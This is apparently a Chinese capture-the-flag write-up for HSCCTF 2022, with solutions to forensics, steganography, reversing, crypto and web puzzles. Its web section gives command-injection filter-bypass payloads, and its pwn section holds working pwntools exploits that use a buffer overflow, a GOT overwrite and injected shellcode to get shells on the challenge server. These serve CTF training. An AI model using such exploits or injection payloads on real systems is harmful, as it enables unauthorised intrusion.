目录
MISC
Sign-in
DORAEMON
汝闻,人言否
wireshark
PCXP
WEB
CLICK
Web-sign in
EXEC
REVERSE
hiahia o(*^▽^*)┛
ANDROID
WAY
SPARK
CRYPTO
Easy SignIn
AFFINE
Baby RSA
PWN
Ez pwn
EZPWN
SHALL
关注公众号,发送HSC2019
1、zip根据注释
哆啦A梦把泡好的QR放进口袋后,用六位数字把自己放好了。你能找到它吗?
使用6位数字爆破得到密码:376852
2、解压zip得到图片,修改高度得到残缺的二维码
3、修改两个角扫码得到flag。
1、010分析发现结尾有多余数据,多余数据开头为4b 50 03 04 怀疑是zip文件。
2、分离处多余数据,头尾 4b 50 改为 50 4b 保存为zip得到一个加密的zip文件。
3、zip注释信息为:qazsedcftrfvgycft6yhntgbnytfvbhyik,.;p 像是键盘码:
qazsedcft rfvgy cft6yhn tgbn ytfvbhy ik,.;p
得到密码:WVALOU
4、解压缩得flag文件,查看文件头为wav,Audacity查看频谱图,得到flag:
flag{e5353bb7b57578bd4da1c898a8e2d767}
1、wireshark.zip分理处wireshark.png
2、lsb隐写wireshark.png得到一张图片,打开时二维码,扫码得到:wrsak..iehr370
3、对wrsak..iehr370使用栅栏解码:wireshark3.7.0
4、使用密码wireshark3.7.0解压wireshark.zip得到 wireshark
5、打开发现类似于pdf但是头部有问题,修复文件头打开发现是wireshark手册
6、010查看pdf二进制发现很多09 20组成得whitespace摘出来,20替换为30 09替换为31
8、
exp转换:
from Crypto.Util.number import long_to_bytes
c=[
"1110100",
"1111000",
"1110100",
"1100110",
"1101100",
"1100001",
"1100111",
"1111011",
"1000111",
"1101111",
"110000",
"1100100",
"1001010",
"110000",
"1000010",
"1011111",
"1111001",
"110000",
"1110101",
"1100110",
"1001001",
"1101110",
"1100100",
"1001100",
"1110100",
"1111101"]
flag=''
for i in c:
flag+=chr(int(i,2))
print(flag)
#txtflag{Go0dJ0B_y0ufIndLt}
1、vol -f ./PCXP2.raw --profile=WinXPSP2x86 filescan | grep -E 'png|jpg|gif|zip|rar|7z|pdf|txt|doc'
2、vol -fPCXP2.raw --profile=WinXPSP2x86 dumpfiles -Q 0x000000000227db70 -D ./
得到ffflaaagggg.rar 另一个ffflaaagggg.zip也导出来了 发现没用。
3、vol -f PCXP1.raw --profile=WinXPSP2x86 filescan | grep -E 'png|jpg|gif|zip|rar|7z|pdf|txt|doc|flag'
4、vol -f PCXP1.raw --profile=WinXPSP2x86 dumpfiles -Q 0x00000000021221e0 -D ./
得到mirror.rar
5、解压得到mirror.png:
010打开发现后半部分有多余数据反序了
分离出来逆序
得到key:
HSC-1th202248H
6、解压ffflaaagggg.rar得到secret.pcap
foremost解压出两张png 使用水印隐写得到:
flag:flag{Wat3rMarkPtysc}
点击28800次
1、控制台:var2=28800
2、点一下即可出flag
1、根据提示访问/robots.txt
User-agent: *
Disallow:
Disallow: fiag_ls_h3re.php
2、访问fiag_ls_h3re.php,显示不在这 但是右键和F12被禁用。
3、使用插件禁用js ,查看源码得到flag
1、需要绕过过滤进行命令执行。
针对命令可使用双写绕过。
针对空格可使用$IFS绕过。
命令执行后没有回显,可使用>写入文件,访问文件得到命令执行结果。
2、执行命令:
cmd=llss$IFS/>1
cmd=cacatt$IFS/ctf_is_fun_flflagag2021>1
ida分析逻辑:
qmemcpy(v4, "igdb~Mumu@p&>%;%<$
前面是对v4处理,处理完成后与输入的flag做对比,所以,patch一下代码使得对比失败后不退出,然后再返回处下断点,查看下V4的内容即可。
qmemcpy(v4, "igdb~Mumu@p&>%;%<$
对应逆向即可。
iArr = [102, 13, 99, 28, 127, 55, 99, 19, 109, 1, 121, 58, 83, 30, 79, 0, 64, 42]
iArr2 = [42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 42]
#iArr2==iArr
#exp:
#flag{xxxx}
for i in range(17):
if i % 2 == 0:
iArr[i] = iArr[i] ^ i
for i in range(17):
if i % 2 != 0:
iArr[i] = iArr[i] ^ iArr[i + 1];
pass
print(bytes(iArr))
1、脱upx壳:
upx -d maze-upx.exe
2、ida分析得到迷宫:OIIIIOOIO#IOOOIIOIOIIIIII
OIIII
OOIO#
IOOOI
IOIOI
IIIII
3、手动得到路径sdsddwd
4、计算md5
exp:
m='OIIIIOOIO#IOOOIIOIOIIIIII'
for i in range(0,len(m),5):
print(m[i:i+5])
'''
OIIII
OOIO#
IOOOI
IOIOI
IIIII
'''
#sdsddwd
import hashlib
print(hashlib.md5(b"sdsddwd").hexdigest())
#flag{6654b3343f6f3f6223a721e7f65e87f8}
ida分析不了,使用ghidra得到伪代码:
算法简单逆向即可:
exp
a = '37463f3044413243';
b = '3429000000000000';
enc=bytes.fromhex('37463f30444132433429')
flag=''
for i in range(10):
flag+=chr((enc[i]+0x2f)&0xff)
print(flag)
题目:
5445705857464579517A4A48546A4A455231645457464243566B5579556C7053546C4A4E524564565646644D515670455130354C5755644F5231685256314A5452315A5552304E57576C5A49525430395054303950513D3D
exp:
a='5445705857464579517A4A48546A4A455231645457464243566B5579556C7053546C4A4E524564565646644D515670455130354C5755644F5231685256314A5452315A5552304E57576C5A49525430395054303950513D3D'
flag=bytes.fromhex(a)
import base64
flag=base64.b64decode(flag)
flag=base64.b32decode(flag)
flag=base64.b64decode(flag)
print(flag)
仿射密码,先根据存在'flag'爆破a、b 然后求解。
exp:
# -*- coding: utf-8 -*-
import string
import hashlib,gmpy2
letter=string.ascii_letters+string.digits
def affine_encode(m,a,b,origin="abcdefghijklmnopqrstuvwxyz"):
r = ""
for i in m:
if origin.find(i) != -1:
r += origin[(a*origin.index(i)+b) % len(origin)]
else:
r += i
return r
def affine_decode(c,a,b,origin="abcdefghijklmnopqrstuvwxyz"):
r = ""
n = len(origin)
try:
ai = gmpy2.invert(a,n) % n
for i in c:
if origin.find(i) != 1:
r += origin[(ai*(origin.index(i)-b)) % n]
else:
r += i
return r
except:
return ""
c="xGJ13kkRK9QDfORQomFOf9NZs9LKVZvGqVIsVO9NOkorv"
for a in range(100):
for b in range(100):
ff=affine_decode(c,a,b,letter)
if 'flag' in ff:
print(a,b,ff)
import hashlib
result='Oh62Affine1sSti1lN0tSecureEnoughToProtectflag'
flag = hashlib.md5(result.encode()).hexdigest()
print("flag{"+flag+"}")
#11 17 Oh62Affine1sSti1lN0tSecureEnoughToProtectflag
#11 79 Oh62Affine1sSti1lN0tSecureEnoughToProtectflag
#73 17 Oh62Affine1sSti1lN0tSecureEnoughToProtectflag
#73 79 Oh62Affine1sSti1lN0tSecureEnoughToProtectflag
#flag{2b9b99caae1cc49e5b5aacbc8cc22350}
1、计算P高位
from Crypto.Util.number import *
import gmpy2
def lfsr(status,mask):
out = (status << 1) & 0xffffffff
i=(status&mask)&0xffffffff
lastbit=0
while i!=0:
lastbit^=(i&1)
i=i>>1
out^=lastbit
return (out,lastbit)
status= 1
mask = 0b10110001110010011100100010110101
p=''
key='0101110100100111011011011000111010000111101000101010100100100011010111011000010010100101110110011101110110010100010111001110010011101010111011001100011011010110001010011111111110100110101010101110100110011010110101110110000110010101010000010110100110110110001110101011000011110100011011100101101101001000110010100111000111001111010101011011111110010111100101111001010000100010100001000111010011011111010011101100011101011010011010110001101110110110000110010011001101100000110000110100101010010010110101100101111101110000010011101110010101110100011101100110111111001010'
#key='0001001001110010101000100011011111010000000011000111111010101110010101111011110001101011001110101010001011000011101101000110011001011110111001111110110110011001011100000010110000000100100000101100100111011000000011101101110010001100011110001100010001101010101011101000100100100010011111111110001111100001011110110011010000011000101110110001010110000111111010011010111011101000101101101110011101000110010001011111001111000010001011010101001110100001111010000010010111111100000001011010100100111000111101101100110101000010111100010100000111110100000111001111101001000000'
for i in range(568):
curnum = int(key[i])
(status,out)=lfsr(status,mask)
p+=str(curnum ^ out)
print(p)
#p=p+'0'*(1024-568)
p=int(p,2)
print("p=",hex(p))
得到p= 0x807c1395b8128e6de865ab20dd2a39684f6831464553c65215cfe2861192657b6938d227c75e902ae858fdbd8b118c8522c08a3bf978bb203bc1644fe526f2de55b065b0507958
因为已知p高位只有568位 需要有576位才可以推导出p,所以需要爆破8位。
sage脚本:
from sage.all import *
import binascii
n = 9363543374665338283861145656340115756598328744870620756798779080826725774691364161648335378062705433999048117564356637094421930886166369832353405527855104576202658647651524758179962855692461154859961903531990172279764099199157181167775307950690492969859829926808950964120678082460448847927074487568619536568740301649988555476490206693181162301088156855926656544441682939839165455244630182978802660669255401576213941067679888164237586879364615664942234247896214195262510935345922512831632385741735810122730130366521612834556565838623708828780093323310348242654778247293430853566054703991781432542625271396246500576703
cipher = 3641304537029815746727163894554557322382012539953948183406308231174259571263608621970973671202001456955622458371303424750815017578104069924877881162707673935496925529412748663209884628320657034190702348924814794263041483260377960569530869386619921425415323912964305979776909598200202236912823968867485696101691879580799000240715778010424877093758489309380968229017074542588151574195295436881889313935734282141447498134543053106463951864974512375314091440713165047188590693431938599822340588934591712592995622334522799914563528630705687647950894928965913199772209825508001274120556508220248069647851360567609656517789
e2 = 65537
pbits = 1024
for i in range(0,127):
p4=0x807c1395b8128e6de865ab20dd2a39684f6831464553c65215cfe2861192657b6938d227c75e902ae858fdbd8b118c8522c08a3bf978bb203bc1644fe526f2de55b065b050795800
p4=p4+int(hex(i),16)
print(hex(p4))
kbits = pbits - p4.nbits() #未知需要爆破的比特位数
print(p4.nbits())
p4 = p4 << kbits
PR. = PolynomialRing(Zmod(n))
f = x + p4
roots = f.small_roots(X=2^kbits, beta=0.4) #进行爆破
#rint roots
if roots: #爆破成功,求根
p = p4+int(roots[0])
print("p: ", hex(int(p)))
assert n % p == 0
q = n/int(p)
print("q: ", hex(int(q)))
print(gcd(p,q))
phin = (p-1)*(q-1)
print(gcd(e2,phin))
d = inverse_mod(e2,phin)
flag = pow(cipher,d,n)
flag = hex(flag)[2:]
print(bytes.fromhex(flag))
#encoding=utf-8
from pwn import *
fpath='/mnt/d/ctf/ti/hscctf2022/pwn-Ez_pwn/pwn'
#r = process(fpath)
r = remote("hsc2019.site",10144)
backdoor=0x400741
payload=b"a"*64+p64(0)+p64(0x400740)+p64(backdoor)
r.sendline(payload)
r.interactive()
#encoding=utf-8
from pwn import *
fpath='/mnt/d/ctf/ti/hscctf2022/pwn-EZPWN/pwn'
#r = process(fpath)
r = remote("hsc2019.site",10456 )
elf=ELF(fpath)
backdoor=0x400796
r.sendlineafter("your ID?",'aa')
r.sendlineafter("Give me the target address?",str(elf.got['printf']))
r.sendlineafter("Give me the data: ",p64(backdoor))
r.interactive()
在0x0x600000处内存,寻找地址存储地址大于本身0x50以上的。发现在0x600088处:
0x600088 —▸ 0x60010c (hello)
于是将start的ebp调整到0x600088对应main内写入数据的地址为:0x600088+0x50 = 0x6000D8,能够覆盖start返回地址0x60010c,在0x60010c写入shellcode
#encoding=utf-8
from pwn import *
from pwn import *
context(os='linux',arch='amd64')
fpath='/mnt/d/ctf/ti/hscctf2022/pwn-SAHELL/pwn'
#r = process(fpath)
r = remote("hsc2019.site",10655 )
code = shellcraft.sh()
shellcode = asm(code)
#gdb.attach(r,'b *0x4000cb')
payload=b'\0'*0x1a0+p64(0x600088)+p64(0x4000FB)+p64(0)+p64(0x60010C)
r.sendline(payload)
payload=b"\x90"*0x34+b"\x90"*0+shellcode
#pause()
r.sendline(payload)
r.interactive()